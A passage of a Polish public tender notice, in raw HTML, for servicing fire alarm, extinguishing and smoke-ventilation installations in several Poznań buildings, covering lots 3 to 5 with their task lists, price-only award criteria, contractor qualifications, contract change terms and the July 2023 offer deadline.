wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenia zamówienia z wolnej ręki o których mowa <br/>w art. 214 ust. 1 pkt. 7 ustawy o wartości 30% zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta z najniższą ceną otrzyma max ilość punktów, pozostałe oferty oceniane będą <br/>wg wzoru: <br/> Najniższa cena brutto <br/> K1 = x 100 x 100 %<br/> Cena brutto oferty badanej <br/> <br/>Za najkorzystniejszą zostanie uznana oferta z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Serwisowanie urządzeń instalacji tryskaczowej w bud. nr 1,45,52<br/> przy ul. Bukowskiej 34,w Poznaniu<br/><br/><br/><br/>Zakres prac będzie obejmował:<br/>1) Utrzymania w stałej sprawności technicznej przekazanych w konserwację<br/> i serwisowanie:<br/> a) instalacji sygnalizacji pożaru,<br/> b) stałych systemów i urządzeń gaśniczych,<br/> c) urządzeń wentylacji oddymiającej,<br/> d) klap i okien dymowych i klap przeciwpożarowych odcinających,<br/> e) dźwiękowych systemów ostrzegawczych,<br/> f) innych urządzeń pomocniczych współpracujących z instalacją wykrywania<br/> i alarmowania pożarowego w tym EBI (komunikacja).<br/> 2) Sprawdzenie stanu technicznego i konserwacja sygnalizatorów akustycznych <br/> i optycznych.<br/> 3) Sprawdzenie i konserwacja 100% elementów detekcyjnych w ciągu roku trwania<br/> umowy. (tj. ¼ czujek zamontowanych w instalacji w czasie każdego przeglądu<br/> kwartalnego), w tym czyszczenie komór dozorowych czujek.<br/>4) Sprawdzenie działania i konserwacja central, ich stanu technicznego <br/> i parametrów zgodnie z DTR.<br/>5) Sprawdzenie i konserwacja układu zasilania (dokręcenie i czyszczenie styków).<br/>6)Sprawdzenie wszystkich części i urządzeń systemów pod kątem ewentualnych<br/> zewnętrznych uszkodzeń (naprawa drobnych uszkodzeń).<br/>7) Sprawdzenie zamocowania wszystkich elementów (poprawa mocowania).<br/>8) Sprawdzenie i konserwacja Ręcznych Ostrzegaczy Pożarowych.<br/>9) Sprawdzenie wszystkich linii dozorowych poprzez losowo wybrane w każdej<br/> strefie sygnalizatory (czujka lub ostrzegacz pożarowy) pożaru za pomocą<br/> imitatora źródeł zasilania, w celu ustalenia czy centralka sygnalizacji pożaru (CSP) prawidłowo odbiera i wyświetla określone sygnały, emituje alarm akustyczny oraz uruchamia wszystkie urządzenia alarmowe i pomocnicze – przy każdym przeglądzie. <br/>10) Sprawdzenie stanu technicznego przewodów linii dozorowych i sygnałowych,<br/> sprawdzenie ciągłości linii, czyszczenie i dokręcenie styków.<br/>11) Sprawdzenie szczelności elementów (zachowanie IP elementów narażonych <br/> na szkodliwy wpływ czynników atmosferycznych i zalania na skutek awarii<br/> innych instalacji obiektowych).<br/>12) Sprawdzenie i konserwacja urządzeń przełączających.<br/>13) Sprawdzenie poprawności działania wszystkich czujek za pomocą imitatora <br/> dymu, temperatury itp. – co najmniej raz w roku.<br/>14) Sprawdzenie działania i konserwacja urządzeń zewnętrznych sygnalizacyjnych.<br/>15) Wymiana części o ograniczonej żywotności (np. diody, żarówki, bezpieczniki, <br/> szybki ochronne itp.).<br/>16) Usunięcie zauważonych uszkodzeń linii dozorowych, sygnałowych w czasie ich<br/> normalnej eksploatacji, uzupełnienia uchwytów, linek nośnych, poprawienie<br/> mocowań.<br/>17) Regulacja elementów systemu.<br/>18) Sprawdzenie historii alarmów centrali oraz wszystkich zapisów w książce<br/> eksploatacji oraz podejmowanie niezbędnych działań zmierzających <br/> do prawidłowej pracy instalacji.<br/>19) Sprawdzenie i konserwacja (czyszczenie, dokręcenie styków) elementów<br/> rezerwowych źródeł zasilania – pomiar pojemności akumulatorów <br/>20) Dokonywanie wpisów w książce pracy (konserwacji) instalacji <br/>o każdorazowym przeglądzie i wykonanych czynnościach oraz dokonywanych naprawach,<br/>21)Przeprowadzenie w trakcie I przeglądu testu funkcjonalnego poszczególnych systemów w zakresie prawidłowości działania (i współdziałania) urządzeń przeciwpożarowych, w celu ujawnienia ewentualnych rozbieżności pomiędzy ich faktycznym i zaplanowanym działaniem (zgodność z algorytmem sterowań). Testów należy dokonać w sposób nie powodujący: niepożądanych reakcji ludzi, uszkodzenia urządzeń przeciwpożarowych oraz strat finansowych.<br/>22)Sprawdzenie komunikacji pomiędzy centralami obiektowymi ppoż., a centralą główną w obiekcie Strażnicy Ppoż. i Lokalnego Centrum Nadzoru w systemie SECOLOG.<br/>23)Sprawdzenie komunikacji w pętlach głównych i podrzędnych.<br/>24)Sprawdzenie reakcji systemu na przerwy w pętlach.<br/>25)Sprawdzenie komunikacji pomiędzy centralami pożarowymi, a dialerami <br/> i konwerterami światłowodowymi.<br/>26)Sprawdzenie komunikacji i prawidłowości przesyłanych komunikatów przez centrale ppoż. do systemu monitoringu i zarządzania obiektu tzw. EBI (Enterprise Buildings Integrator). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50413200-5 - Usługi w zakresie napraw i konserwacji sprzętu gaśniczego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenia zamówienia z wolnej ręki o których mowa <br/>w art. 214 ust. 1 pkt. 7 ustawy o wartości 30% zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta z najniższą ceną otrzyma max ilość punktów, pozostałe oferty oceniane będą <br/>wg wzoru: <br/> Najniższa cena brutto <br/> K1 = x 100 x 100 %<br/> Cena brutto oferty badanej <br/> <br/>Za najkorzystniejszą zostanie uznana oferta z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Serwisowanie urządzeń instalacji ppoż. w bud. nr 2,3,4,5,<br/> przy ul. Kulasa 8 w Poznaniu<br/>Zakres prac będzie obejmował:<br/>1) Utrzymania w stałej sprawności technicznej przekazanych w konserwację<br/> i serwisowanie:<br/> a) instalacji sygnalizacji pożaru,<br/> b) stałych systemów i urządzeń gaśniczych,<br/> c) urządzeń wentylacji oddymiającej,<br/> d) klap i okien dymowych i klap przeciwpożarowych odcinających,<br/> e) dźwiękowych systemów ostrzegawczych,<br/> f) innych urządzeń pomocniczych współpracujących z instalacją wykrywania<br/> i alarmowania pożarowego w tym EBI (komunikacja).<br/> 2) Sprawdzenie stanu technicznego i konserwacja sygnalizatorów akustycznych <br/> i optycznych.<br/> 3) Sprawdzenie i konserwacja 100% elementów detekcyjnych w ciągu roku trwania<br/> umowy. (tj. ¼ czujek zamontowanych w instalacji w czasie każdego przeglądu<br/> kwartalnego), w tym czyszczenie komór dozorowych czujek.<br/>4) Sprawdzenie działania i konserwacja central, ich stanu technicznego <br/> i parametrów zgodnie z DTR.<br/>5) Sprawdzenie i konserwacja układu zasilania (dokręcenie i czyszczenie styków).<br/>6)Sprawdzenie wszystkich części i urządzeń systemów pod kątem ewentualnych<br/> zewnętrznych uszkodzeń (naprawa drobnych uszkodzeń).<br/>7) Sprawdzenie zamocowania wszystkich elementów (poprawa mocowania).<br/>8) Sprawdzenie i konserwacja Ręcznych Ostrzegaczy Pożarowych.<br/>9) Sprawdzenie wszystkich linii dozorowych poprzez losowo wybrane w każdej<br/> strefie sygnalizatory (czujka lub ostrzegacz pożarowy) pożaru za pomocą<br/> imitatora źródeł zasilania, w celu ustalenia czy centralka sygnalizacji pożaru (CSP) prawidłowo odbiera i wyświetla określone sygnały, emituje alarm akustyczny oraz uruchamia wszystkie urządzenia alarmowe i pomocnicze – przy każdym przeglądzie. <br/>10) Sprawdzenie stanu technicznego przewodów linii dozorowych i sygnałowych,<br/> sprawdzenie ciągłości linii, czyszczenie i dokręcenie styków.<br/>11) Sprawdzenie szczelności elementów (zachowanie IP elementów narażonych <br/> na szkodliwy wpływ czynników atmosferycznych i zalania na skutek awarii<br/> innych instalacji obiektowych).<br/>12) Sprawdzenie i konserwacja urządzeń przełączających.<br/>13) Sprawdzenie poprawności działania wszystkich czujek za pomocą imitatora <br/> dymu, temperatury itp. – co najmniej raz w roku.<br/>14) Sprawdzenie działania i konserwacja urządzeń zewnętrznych sygnalizacyjnych.<br/>15) Wymiana części o ograniczonej żywotności (np. diody, żarówki, bezpieczniki, <br/> szybki ochronne itp.).<br/>16) Usunięcie zauważonych uszkodzeń linii dozorowych, sygnałowych w czasie ich<br/> normalnej eksploatacji, uzupełnienia uchwytów, linek nośnych, poprawienie<br/> mocowań.<br/>17) Regulacja elementów systemu.<br/>18) Sprawdzenie historii alarmów centrali oraz wszystkich zapisów w książce<br/> eksploatacji oraz podejmowanie niezbędnych działań zmierzających <br/> do prawidłowej pracy instalacji.<br/>19) Sprawdzenie i konserwacja (czyszczenie, dokręcenie styków) elementów<br/> rezerwowych źródeł zasilania – pomiar pojemności akumulatorów <br/>20) Dokonywanie wpisów w książce pracy (konserwacji) instalacji <br/>o każdorazowym przeglądzie i wykonanych czynnościach oraz dokonywanych naprawach,<br/>21)Przeprowadzenie w trakcie I przeglądu testu funkcjonalnego poszczególnych systemów w zakresie prawidłowości działania (i współdziałania) urządzeń przeciwpożarowych, w celu ujawnienia ewentualnych rozbieżności pomiędzy ich faktycznym i zaplanowanym działaniem (zgodność z algorytmem sterowań). Testów należy dokonać w sposób nie powodujący: niepożądanych reakcji ludzi, uszkodzenia urządzeń przeciwpożarowych oraz strat finansowych.<br/>22)Sprawdzenie komunikacji pomiędzy centralami obiektowymi ppoż., a centralą główną w obiekcie Strażnicy Ppoż. i Lokalnego Centrum Nadzoru w systemie SECOLOG.<br/>23)Sprawdzenie komunikacji w pętlach głównych i podrzędnych.<br/>24)Sprawdzenie reakcji systemu na przerwy w pętlach.<br/>25)Sprawdzenie komunikacji pomiędzy centralami pożarowymi, a dialerami <br/> i konwerterami światłowodowymi.<br/>26)Sprawdzenie komunikacji i prawidłowości przesyłanych komunikatów przez centrale ppoż. do systemu monitoringu i zarządzania obiektu tzw. EBI (Enterprise Buildings Integrator). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50413200-5 - Usługi w zakresie napraw i konserwacji sprzętu gaśniczego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenia zamówienia z wolnej ręki o których mowa <br/>w art. 214 ust. 1 pkt. 7 ustawy o wartości 30% zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta z najniższą ceną otrzyma max ilość punktów, pozostałe oferty oceniane będą <br/>wg wzoru: <br/> Najniższa cena brutto <br/> K1 = x 100 x 100 %<br/> Cena brutto oferty badanej <br/> <br/>Za najkorzystniejszą zostanie uznana oferta z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Serwisowanie urządzeń instalacji ppoż. bud. nr 2 przy ul. Wojska <br/> Polskiego 86-90 w Poznaniu.<br/>Zakres prac będzie obejmował:<br/>1) Utrzymania w stałej sprawności technicznej przekazanych w konserwację<br/> i serwisowanie:<br/> a) instalacji sygnalizacji pożaru,<br/> b) stałych systemów i urządzeń gaśniczych,<br/> c) urządzeń wentylacji oddymiającej,<br/> d) klap i okien dymowych i klap przeciwpożarowych odcinających,<br/> e) dźwiękowych systemów ostrzegawczych,<br/> f) innych urządzeń pomocniczych współpracujących z instalacją wykrywania<br/> i alarmowania pożarowego w tym EBI (komunikacja).<br/> 2) Sprawdzenie stanu technicznego i konserwacja sygnalizatorów akustycznych <br/> i optycznych.<br/> 3) Sprawdzenie i konserwacja 100% elementów detekcyjnych w ciągu roku trwania<br/> umowy. (tj. ¼ czujek zamontowanych w instalacji w czasie każdego przeglądu<br/> kwartalnego), w tym czyszczenie komór dozorowych czujek.<br/>4) Sprawdzenie działania i konserwacja central, ich stanu technicznego <br/> i parametrów zgodnie z DTR.<br/>5) Sprawdzenie i konserwacja układu zasilania (dokręcenie i czyszczenie styków).<br/>6)Sprawdzenie wszystkich części i urządzeń systemów pod kątem ewentualnych<br/> zewnętrznych uszkodzeń (naprawa drobnych uszkodzeń).<br/>7) Sprawdzenie zamocowania wszystkich elementów (poprawa mocowania).<br/>8) Sprawdzenie i konserwacja Ręcznych Ostrzegaczy Pożarowych.<br/>9) Sprawdzenie wszystkich linii dozorowych poprzez losowo wybrane w każdej<br/> strefie sygnalizatory (czujka lub ostrzegacz pożarowy) pożaru za pomocą<br/> imitatora źródeł zasilania, w celu ustalenia czy centralka sygnalizacji pożaru (CSP) prawidłowo odbiera i wyświetla określone sygnały, emituje alarm akustyczny oraz uruchamia wszystkie urządzenia alarmowe i pomocnicze – przy każdym przeglądzie. <br/>10) Sprawdzenie stanu technicznego przewodów linii dozorowych i sygnałowych,<br/> sprawdzenie ciągłości linii, czyszczenie i dokręcenie styków.<br/>11) Sprawdzenie szczelności elementów (zachowanie IP elementów narażonych <br/> na szkodliwy wpływ czynników atmosferycznych i zalania na skutek awarii<br/> innych instalacji obiektowych).<br/>12) Sprawdzenie i konserwacja urządzeń przełączających.<br/>13) Sprawdzenie poprawności działania wszystkich czujek za pomocą imitatora <br/> dymu, temperatury itp. – co najmniej raz w roku.<br/>14) Sprawdzenie działania i konserwacja urządzeń zewnętrznych sygnalizacyjnych.<br/>15) Wymiana części o ograniczonej żywotności (np. diody, żarówki, bezpieczniki, <br/> szybki ochronne itp.).<br/>16) Usunięcie zauważonych uszkodzeń linii dozorowych, sygnałowych w czasie ich<br/> normalnej eksploatacji, uzupełnienia uchwytów, linek nośnych, poprawienie<br/> mocowań.<br/>17) Regulacja elementów systemu.<br/>18) Sprawdzenie historii alarmów centrali oraz wszystkich zapisów w książce<br/> eksploatacji oraz podejmowanie niezbędnych działań zmierzających <br/> do prawidłowej pracy instalacji.<br/>19) Sprawdzenie i konserwacja (czyszczenie, dokręcenie styków) elementów<br/> rezerwowych źródeł zasilania – pomiar pojemności akumulatorów <br/>20) Dokonywanie wpisów w książce pracy (konserwacji) instalacji <br/>o każdorazowym przeglądzie i wykonanych czynnościach oraz dokonywanych naprawach,<br/>21)Przeprowadzenie w trakcie I przeglądu testu funkcjonalnego poszczególnych systemów w zakresie prawidłowości działania (i współdziałania) urządzeń przeciwpożarowych, w celu ujawnienia ewentualnych rozbieżności pomiędzy ich faktycznym i zaplanowanym działaniem (zgodność z algorytmem sterowań). Testów należy dokonać w sposób nie powodujący: niepożądanych reakcji ludzi, uszkodzenia urządzeń przeciwpożarowych oraz strat finansowych.<br/>22)Sprawdzenie komunikacji pomiędzy centralami obiektowymi ppoż., a centralą główną w obiekcie Strażnicy Ppoż. i Lokalnego Centrum Nadzoru w systemie SECOLOG.<br/>23)Sprawdzenie komunikacji w pętlach głównych i podrzędnych.<br/>24)Sprawdzenie reakcji systemu na przerwy w pętlach.<br/>25)Sprawdzenie komunikacji pomiędzy centralami pożarowymi, a dialerami <br/> i konwerterami światłowodowymi.<br/>26)Sprawdzenie komunikacji i prawidłowości przesyłanych komunikatów przez centrale ppoż. do systemu monitoringu i zarządzania obiektu tzw. EBI (Enterprise Buildings Integrator). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50413200-5 - Usługi w zakresie napraw i konserwacji sprzętu gaśniczego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenia zamówienia z wolnej ręki o których mowa <br/>w art. 214 ust. 1 pkt. 7 ustawy o wartości 30% zamówienia podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta z najniższą ceną otrzyma max ilość punktów, pozostałe oferty oceniane będą <br/>wg wzoru: <br/> Najniższa cena brutto <br/> K1 = x 100 x 100 %<br/> Cena brutto oferty badanej <br/> <br/>Za najkorzystniejszą zostanie uznana oferta z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej <br/>Wykonawca spełnia warunek, jeżeli dysponuje lub będzie dysponował: <br/>przynajmniej jedną osobą przeprowadzającą prace konserwacyjno-serwisowe:<br/> - mającą uprawnienia, aktualne świadectwa kwalifikacyjne wydane przez Urząd Dozoru Technicznego na podstawie Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003 r. (Dz. U. nr 89 poz. 829 z późniejszymi zmianami) uprawniające do wykonywania prac konserwacyjno – serwisowych w specjalności eksploatacji i dozoru serii „E” Grupy 1 pkt. 2, 5 i „D” Grupy 1 pkt. 10 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">-	Oświadczenia Wykonawcy o aktualności informacji zawartych we wstępnym oświadczeniu o niepodleganiu wykluczeniu, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego w Rozdz. VI SWZ (wzór oświadczenia stanowi Załącznik nr 4A do SWZ). W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie to składa każdy z Wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">-	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnego ze wzorem stanowiącym załącznik nr 8 do SWZ.<br/><br/>Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, zamawiający może w każdym czasie wezwać wykonawcę lub wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3.	Wykonawca przed podpisaniem umowy o wykonanie zamówienia przedłoży Zamawiającemu:<br/>a)	Kserokopię uprawnień zgodnie ze złożonym w ofercie załącznikiem nr 8 do SWZ - wykaz osób),<br/>b)	aktualną polisę ubezpieczeniową obejmującą odpowiedzialność cywilną <br/>w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia na kwotę co najmniej odpowiadającą wartości oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w rozdziale VIII. pkt 1 SWZ, składa wraz z ofertą każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia – według Załącznika nr 6 do SWZ. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy – wg załącznika nr 6 do SWZ<br/>4)	Podmiotowe środki dowodowe, o których mowa w rozdziale VIII SWZ, na wezwanie Zamawiającego, składa ten z Wykonawców, który potwierdza spełnianie warunków udziału w postępowaniu, określonych w rozdziale VII SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Zamawiający zastrzega sobie prawo zmian w treści umowy zgodnie z projektem umowy stanowiącym załącznik do SWZ oraz w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:<br/>1)	konieczności dostosowania się przez Zamawiającego do przepisów o ochronie informacji niejawnych skutkujących koniecznością dokonania zmian w przedmiocie zamówienia realizowanym przez Wykonawcę w ramach niniejszej umowy,<br/>2)	zmian w zakresie zmniejszenia przedmiotu zamówienia uwarunkowanej zmianą planu finansowego Zamawiającego; konieczności wprowadzenia korekt zmniejszających zakres przedmiotu zamówienia na skutek zmniejszenia otrzymania przez Zamawiającego środków finansowych przydzielonych w ramach planu finansowego na dany rok budżetowy, uprzednio zaplanowanych <br/>i zapotrzebowanych przez Zamawiającego na zabezpieczenie realizacji usług,<br/>3)	zmiany kwoty wynagrodzenia brutto – w przypadku gdy w trakcie realizacji umowy nastąpi ustawowa zmiana podatku VAT, <br/>4)	zmiany w zakresie osób reprezentujących strony umowy w szczególności w sytuacjach losowych, zmian organizacyjnych,<br/>5)	zmiany w zakresie wskazanych dla realizacji umowy podwykonawców – w przypadku gdy w szczególności podwykonawca wadliwie wykonuje umowę w tym zaprzestał jej wykonywania lub w razie upadłości / likwidacji podwykonawcy,<br/>6)	wystąpienia sytuacji nieprzewidywalnych, uzasadnionych i niezależnych od stron umowy.<br/>7)	Zmiany umowy mogą być dokonywane wyłącznie za zgodą obu Stron, w formie pisemnej (w postaci aneksu) pod rygorem nieważności.<br/>8)	Nie stanowią zmiany umowy w rozumieniu art. 455 ustawy:<br/>a)	zmiana danych teleadresowych,<br/>b)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy;<br/>9)	Zamawiający zastrzega sobie, iż ostateczna treść umowy w stosunku do projektu umowy może ulec zmianie, jednakże wyłącznie w zakresie nie zmieniającym istotnych warunków złożonej oferty i SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-06 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/14wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Kompletna oferta musi zawierać: <br/>a)	wypełniony formularz oferty - sporządzony wg wzoru stanowiącego załącznik nr 1 do SWZ,<br/>b)	wypełniony formularz wyceny ofertowej – sporządzony wg wzoru stanowiącego załącznik nr 2 do SWZ (2.1 – 2.5 w zależności od numeru zadania)<br/>c)	stosowne pełnomocnictwo(a) w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej, <br/>d)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, dotyczy również spółek cywilnych,<br/>e)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia wykonawcy wspólnie ubiegający się o 